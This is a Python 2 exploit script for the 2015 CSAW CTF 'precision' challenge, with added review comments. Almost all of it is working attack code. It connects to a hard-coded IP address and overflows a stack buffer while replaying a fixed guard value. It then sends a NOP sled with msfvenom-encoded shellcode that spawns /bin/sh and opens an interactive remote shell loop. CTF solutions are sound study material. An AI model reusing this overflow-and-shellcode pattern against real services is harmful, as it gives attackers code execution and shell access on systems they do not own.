
CTF

2015 CSAW CTF precision 100 exonly


from socket import *

from struct import *

import time


#####################################

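def until(s, string):
    """Read from socket-like *s* one byte at a time until *string* appears.

    Args:
        s: object exposing ``recv(n)`` (the connected socket in this script).
        string: delimiter to wait for.

    Returns:
        Everything received so far, ending with the delimiter.

    Raises:
        EOFError: if the peer closes the connection before the delimiter
            is seen.
    """
    data = ''
    while string not in data:
        chunk = s.recv(1)
        # recv() returns an empty string once the peer has closed the
        # connection; without this check the loop would never terminate.
        if not chunk:
            raise EOFError('connection closed before %r was received' % (string,))
        data += chunk
    return data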

#####################################


def p(x):
    """Pack *x* as a 4-byte little-endian unsigned integer."""
    return pack('<L', x)


def q(x):
    """Pack *x* as an 8-byte little-endian unsigned integer."""
    return pack('<Q', x)


def up(x):
    """Unpack 4 little-endian bytes; the result is a 1-tuple, as struct.unpack returns."""
    return unpack('<L', x)


def uq(x):
    """Unpack 8 little-endian bytes; the result is a 1-tuple, as struct.unpack returns."""
    return unpack('<Q', x)


# Endpoint the script connects to, hard-coded by the author.
# NOTE(review): presumably the CSAW CTF 2015 challenge service named in the
# page title - confirm; the address is unlikely to still host it.
host = '54.173.98.115'

port = 1259


# Plain IPv4 TCP socket. connect() runs as soon as the module is executed and
# no timeout is set in this block.
sock = socket(AF_INET, SOCK_STREAM)

sock.connect((host,port))



# Author's note - the shellcode below was generated with:
# msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00' -e x86/alpha_mixed


# Encoded payload bytes, built up by string concatenation and appended to the
# second message further down. Per the author's note above this block, it is
# generator output with NUL bytes excluded and an alphanumeric-style encoder
# applied; the bytes are pasted verbatim and are not computed here.
shellcode = "\x89\xe6\xdb\xce\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a"

shellcode += "\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59"

shellcode += "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"

shellcode += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"

shellcode += "\x75\x4a\x49\x71\x7a\x34\x4b\x61\x48\x4a\x39\x52\x72\x52"

shellcode += "\x46\x51\x78\x36\x4d\x72\x43\x4b\x39\x59\x77\x65\x38\x76"

shellcode += "\x4f\x70\x73\x42\x48\x53\x30\x31\x78\x74\x6f\x75\x32\x70"

shellcode += "\x69\x52\x4e\x4e\x69\x6b\x53\x73\x62\x6a\x48\x75\x58\x47"

shellcode += "\x70\x57\x70\x67\x70\x64\x6f\x75\x32\x70\x69\x62\x4e\x64"

shellcode += "\x6f\x54\x33\x70\x68\x35\x50\x71\x47\x42\x73\x4d\x59\x4d"

shellcode += "\x31\x4a\x6d\x6d\x50\x41\x41"


# First message: 128 filler bytes, two fixed 32-bit little-endian words,
# 12 more filler bytes, then one fixed 32-bit word.
# NOTE(review): the same two fixed words follow the 128-byte filler in both
# messages; presumably a constant guard value the target compares. A constant
# guard can be replayed once known, unlike a per-run random one - confirm
# against the challenge binary.
payload = "A" * 128

payload += p(0x475a31a5)

payload += p(0x40501555)

payload += "B" * 12 # sfp (author's label for this filler)

payload += p(0x0804851D)


sock.send(payload + "\n")


# Read one reply line, drop its first 6 characters, parse the rest as
# hexadecimal and add 200. The result is packed into the second message.
# NOTE(review): presumably the dropped prefix is a text label in front of an
# address printed by the service - confirm against its actual output.
lib = until(sock, "\n")

lib = lib[6:]

lib = int(lib,16) + 200


# Prints the computed value in decimal, then the next line from the service.
print lib

print until(sock, "\n")


# Second message: same 128-byte filler and the same two fixed words as the
# first message, 16 filler bytes, the value computed from the service's reply,
# 100 bytes of 0x90, the shellcode string, and 30 trailing filler bytes.
# NOTE(review): this layout only has an effect if the target runs bytes from
# the memory it has just written; a non-executable stack and address
# randomisation are the usual mitigations - confirm how the binary was built.
payload2 = "A" * 128


payload2 += p(0x475a31a5)

payload2 += p(0x40501555)

payload2 += "B" * 16 # sfp (author's label for this filler)

payload2 += p(lib) # ret (author's label); p() packs it as 32 bits

payload2 += "\x90" * 100

payload2 += shellcode

payload2 += "C" * 30


# Same value as printed earlier, shown in hexadecimal this time.
print "lib : " + hex(lib)


sock.send(payload2 + "\n")


# Two reads of up to 1024 bytes each; each recv() returns whatever has arrived,
# so the split between the two prints is not fixed.
print sock.recv(1024)

print sock.recv(1024)


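# Interactive loop: each line typed at the '$ ' prompt is sent to the remote
# end with a trailing newline, then up to 1024 bytes of the reply are printed.
# The loop has no exit condition of its own; it ends on an exception or
# interrupt.
while True:
    cmd = raw_input('$ ')
    sock.send(cmd+"\n")
    # Aligned with the two statements above: in the original listing this
    # line sat one column short, which Python rejects as an IndentationError.
    print sock.recv(1024)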

# 아스키(ASCII) 쉘 코드를 써야만 했던 문제

